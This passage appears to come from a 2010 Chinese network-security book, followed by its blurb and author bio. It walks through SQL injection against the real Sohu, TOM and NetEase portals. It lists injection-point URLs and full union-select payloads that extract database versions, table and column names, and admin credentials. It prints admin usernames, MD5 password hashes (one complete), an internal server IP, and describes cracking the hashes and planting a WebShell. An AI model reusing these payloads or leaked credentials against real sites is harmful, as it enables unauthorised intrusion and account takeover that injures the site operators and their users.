對搜狐、網易和TOM三大入口網站的SQL注入漏洞檢測

本文節選自《大中型網路入侵要案直擊與防禦》一書

此外，筆者對搜狐及TOM和網易這三大入口網站作了注入攻擊檢測，發現同樣存在明顯的注入漏洞，安全性很糟糕。

1.MySQL注入檢測搜狐入口網站

首先，來看看搜狐網站，搜狐網站上的動態網頁大部分是採用PHP語言編寫的，同樣注入也很多。例如：

這個網頁是一個歐萊雅廣告頁面，未對提交的數字引數進行檢測，可直接利用SQL注入獲得當前資料版本、庫名、使用者等資訊。首先，通過Order by查詢獲得欄位數目為9，然後通過union select查詢可獲得資料庫的各種資訊（圖241）：

http://app.sh.sohu.com/lo***l/s.php?id=636

圖241 搜狐網站SQL注入查詢資料庫資訊

可得到當前資料庫使用者名稱為admin，資料庫伺服器地址為10.10.82.159，資料庫版本為Mysql 5.0.27，當前資料庫名為sohush。

再進一步檢測，發現其中存在幾個非常重要的資料庫，包括：dvbbs、love008。前者是論壇資料庫，後者是2008專題資料庫。在論壇資料庫中，可猜解出管理員賬號和密碼為：jim、4591b******ee2b5。在love008資料庫中猜解出兩個管理員使用者和密碼分別為（圖242）：

admin 21232f297a*****743894a0e4a801fc3

es 3e4a632cb*****8fc2386fa5f8e4bd76

圖242 猜解出管理員賬號與密碼

雖然說管理員密碼都是MD5加密的，不過現在網上有20G的彩虹表下載，破解這些普通密碼MD5值並不是太困難的事情。通過後臺登陸，攻擊者可以想方設法上傳WebShell並進行提權與進一步滲透入侵操作。

此外，在搜狐網站中還有非常多的SQL注入點，舉例如下：

注入點1（圖243）：http://card.money.****.com/yh/card_product.php?id=71

注入點2：http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403

注入點3：http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入點4：http://mini***.163.com/2009/0909/wuliangye/article.php?id=13

注入點5：http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入點6：http://people.business.****.com/person/plist.php?userid=2047

注入點7：http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275

注入點8：http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905

圖243 搜狐注入點查詢資料庫資訊

2.MySQL注入檢測TOM入口網站

TOM也是國內一大入口網站，在對TOM入口網站進行檢測的過程中，也發現了許多嚴重的SQL注入漏洞，而且危害性非常大，直接導致攻擊者登陸後臺上傳木馬獲得WebShell，並進一步控制整個網站伺服器！

TOM網站的注入點地址為：

直接用Order by進行查詢時，會出錯並跳轉到網站首頁，可使用--終止符號進行隔斷處理，執行如下查詢：

返回正常頁面，得到欄位數為14。再執行如下查詢（圖244）：

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20--

圖244 union聯合查詢獲得資料庫相關資訊

得到當前資料庫版本、資料庫名和使用者。再爆出當前資料庫中的所有表名，提交如下查詢：

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

圖245 查詢到所有表名

在頁面返回資訊中，即可得到所有表名（圖245）。在其中有名為adminuser的表名，表中很可能包含了管理員賬號及密碼，查詢該表中的列名，可提交如下查詢：

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)--

圖246 返回使用者名稱及密碼資料列

從頁面返回資訊中，可以看到使用者名稱及密碼列為username和pw（圖246）。現在要爆出使用者名稱和密碼的資料值，提交如下查詢語句：

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser--

圖247 獲得管理員賬號密碼資訊

從返回的頁面資訊中，可看到管理員使用者名稱為qdjxlq，密碼為3631137b9b0e47608c4ece9decc9a607（圖247）。密碼是經過MD5加密的32密文，破解並不是很困難。得到後臺管理員賬號密碼後，再尋找後臺登陸地址，得到後臺登陸連結地址為（圖248）：

圖248 管理員後臺登陸頁面

登陸後臺獲得WebShell後，就可以進一步入侵控制伺服器並進行滲透攻擊。

3.MySQL注入檢測網易入口網站

在對國內其它入口網站進行檢測時發現，有許多網站也同樣存在著SQL注入漏洞，例如在網易中存在如下注入點連結地址：

通過order by查詢可得到欄位數，再通過提交如下查詢：

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13%20and%201=2%20union%20select%201,database(),user(),version(),5,6,7,8

即可得到資料庫版本、使用者名稱和資料庫名資訊（圖249）。由於資料庫為Mysql 4.0版本，因此不能直接爆出資料表名，只有靠字典一個個進行猜解，猜解起來比較麻煩。

圖249 網易注入點猜解示例

   書名：大中型網路入侵要案直擊與防禦

作者：肖遙 編著

ISBN 978-7-121-11740-4

出版日期：2010年10月

定價：79.00元

開本：16開

頁碼：624 頁

作者簡介

肖遙，網名“冰河洗劍”，國內著名網路安全技術獨立研究人士。

曾從事國防軍工設計，參與過J10A、J11B等戰鬥機配套武器研製，獨立開發出HF25火箭發射器，參與DF8GA及導彈發射架等武器設計。

潛心鑽研網路安全技術10餘年，長期擔任國內多家著名網站的安全顧問，專業從事網路滲透測試與網路風險評估。

長年在《黑客X檔案》、《黑客防線》等國內安全專業媒體上與同行分享最新研究成果。出版有《網路滲透攻擊與安防修煉》、《網站入侵與指令碼安全攻防修煉》、《黑客大曝光》、《黑客攻防大揭祕》等多部安全類暢銷技術專著。其中，《網站入侵與指令碼安全攻防修煉》一書已輸出至中國臺灣等地。

內 容 簡 介

本書以解析各種網路環境下攻防案例的形式來講解各種網路攻擊與防護技術，從“黑客攻擊”與“安全工作者防守”雙向角度來進行介紹。每一章節的內容按照如下脈絡展開：典型攻防案例再現→案例的簡單分析→黑客攻擊技術的系統講解→網管安全防護解決方案→入侵手法與防護難點深度分析。全書真實呈現完整的攻擊與防護事件，可讓讀者瞭解到攻擊者如何選擇攻擊目標，如何制訂攻擊方案，如何繞過攻擊中碰到的問題，網管通常採用哪些防護手法，安全漏洞在何處，網管又如何追蹤攻擊者，等等，因此對學習者和工作者來說都很有吸引力和參考價值。

本書是網路管理員、資訊保安管理員、對網路安全感興趣的人員必備的參考書，也可供大中院校或培訓學校教師和學生閱讀和參考。